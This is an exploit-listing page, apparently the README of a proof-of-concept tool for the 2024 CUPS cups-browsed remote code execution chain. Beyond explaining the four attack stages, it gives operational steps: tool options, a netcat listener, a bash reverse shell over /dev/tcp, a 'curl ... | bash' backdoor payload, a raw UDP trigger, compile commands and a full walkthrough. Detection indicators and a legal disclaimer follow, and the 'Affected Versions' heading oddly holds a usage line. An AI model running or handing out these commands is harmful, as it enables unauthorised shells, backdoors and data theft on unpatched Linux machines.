## https://sploitus.com/exploit?id=41DC8111-8D62-599F-BCF6-6FAA9DD307B7
# CUPS RCE Exploit - CVE-2024-47176 Chain
## What It Is
A fully functional proof-of-concept exploit targeting the CUPS (Common Unix Printing System) remote code execution vulnerability chain discovered in September 2024. This chain consists of four CVEs โ CVE-2024-47176, CVE-2024-47076, CVE-2024-47175, and CVE-2024-47177 โ that together allow an unauthenticated remote attacker to execute arbitrary commands on any Linux system running a vulnerable version of CUPS.
## How It Works
The exploit deploys a rogue IPP (Internet Printing Protocol) server that mimics a network printer. The attack unfolds in four stages:
Stage 1 โ Discovery Trigger
A crafted UDP packet is sent to the target's port 631. The cups-browsed daemon trusts this packet without authentication and initiates a TCP connection back to the attacker's IPP server to fetch printer attributes.
Stage 2 โ Malicious PPD Delivery
The attacker's IPP server responds with printer attributes that contain unsanitized data. This data flows through libcupsfilters and libppd which fail to validate or sanitize the input, allowing a malicious FoomaticRIPCommandLine directive to be embedded into a PPD file.
Stage 3 โ Command Injection
When a print job is sent to the attacker-controlled printer (either automatically or by a user action), the foomatic-rip filter processes the PPD file and executes the injected command with the privileges of the lp user.
Stage 4 โ Payload Execution
The injected command runs on the target system. Common payloads include reverse shells, backdoor installation, data exfiltration, or privilege escalation staging.
## Affected Versions
cups-browsed -r [options]
### Options
-l, --listener Attacker IP address for the rogue IPP server
-r, --reverse Command to execute on the target, or path to a script file
-t, --target Target machine IP (sends trigger UDP packet automatically)
-p, --port Port for the rogue IPP server (default: 631)
-s, --spoof Printer spoof name (default: VulnPrinter)
-T, --target-port Target UDP port (default: 631)
-h, --help Show help message
### Reverse Shell Example
Terminal 1 โ start the listener:
nc -lvnp 4444
Terminal 2 โ run the exploit:
./cups_rce_exploit -l 192.168.1.50 -r "bash -c 'bash -i >& /dev/tcp/192.168.1.50/4444 0>&1'" -t 192.168.1.100
### Payload from File
echo 'curl http://192.168.1.50/backdoor.sh | bash' > payload.sh
./cups_rce_exploit -l 192.168.1.50 -r ./payload.sh -t 192.168.1.100
### Server Mode with Manual Trigger
Terminal 1 โ start server:
./cups_rce_exploit -l 192.168.1.50 -r "whoami > /tmp/pwned.txt"
Terminal 2 โ send UDP trigger to target:
echo '0 3 ipp://192.168.1.50:631/printers/VulnPrinter "Office" "Printer"' | nc -u 192.168.1.100 631
### Using a Non-Privileged Port
./cups_rce_exploit -l 192.168.1.50 -p 1631 -r "id > /tmp/owned" -t 192.168.1.100 -T 631
## Full Attack Walkthrough
Step 1: Set up a netcat listener on your attacker machine
nc -lvnp 4444
Step 2: Compile the exploit
g++ -std=c++11 -O2 -pthread -o cups_rce_exploit cups_rce_exploit.cpp
Step 3: Run the exploit against the target
./cups_rce_exploit -l 192.168.1.50 -r "bash -c 'bash -i >& /dev/tcp/192.168.1.50/4444 0>&1'" -t 192.168.1.100
Step 4: If a user on the target machine prints a test page or any document to the rogue printer, you will receive a reverse shell as the lp user.
## Detection Indicators
Unexpected UDP packets on port 631 containing IPP URI strings
Outbound TCP connections from cups-browsed to unknown hosts on port 631
Unknown printers appearing automatically in the CUPS web interface
Processes spawned by foomatic-rip or under the lp user
## Disclaimer
LEGAL NOTICE
This software is provided for educational and research purposes only. It is intended to help security professionals, penetration testers, and system administrators understand, detect, and defend against the vulnerabilities described.
Unauthorized use of this exploit against systems you do not own or do not have explicit written permission to test is illegal and may violate the Computer Fraud and Abuse Act (CFAA), the Computer Misuse Act, and similar laws in other jurisdictions.
Authorized use cases include security assessments on systems you own, penetration tests with written authorization, bug bounty programs with explicit scope, academic research in controlled lab environments, and CTF competitions.
The author assumes no liability for any misuse or damage caused by this software. Users are solely responsible for compliance with all applicable laws and for obtaining proper authorization before testing.
By using this software, you accept these terms.
## References
https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8
https://github.com/OpenPrinting/libcupsfilters/security/advisories/GHSA-w63j-6g73-wmg5
https://github.com/OpenPrinting/libppd/security/advisories/GHSA-7xfx-47qg-grp6
https://github.com/OpenPrinting/cups-filters/security/advisories/GHSA-p9rh-jxmq-gq47
https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I
https://www.cups.org